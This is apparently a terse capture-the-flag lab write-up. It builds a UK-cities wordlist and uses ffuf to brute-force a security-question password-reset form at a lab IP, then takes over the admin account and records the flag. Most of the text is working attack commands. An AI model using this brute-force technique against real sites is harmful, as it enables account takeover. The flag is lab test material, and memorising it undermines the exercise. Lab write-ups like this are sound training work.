
wget https://raw.githubusercontent.com/datasets/world-cities/master/data/world-cities.csv

cat world-cities.csv | grep 'United Kingdom' | cut -d "," -f 1 > UK_Cities.txt


cookie= 5jnrp9p8t879quv9211a8eiqvv

ffuf -w UK_Cities.txt -u http://94.237.59.30:45662/security_question.php -X POST -H "Content-Type: application/x-www-form-urlencoded" -d "security_response=FUZZ" -fr "Incorrect response." -b "PHPSESSID=5jnrp9p8t879quv9211a8eiqvv" -t 60

Output: Manchester 

Change admin password 

return to login 

login with new password 

HTB{d4740b1801d9880ff70de227a54309f0} 
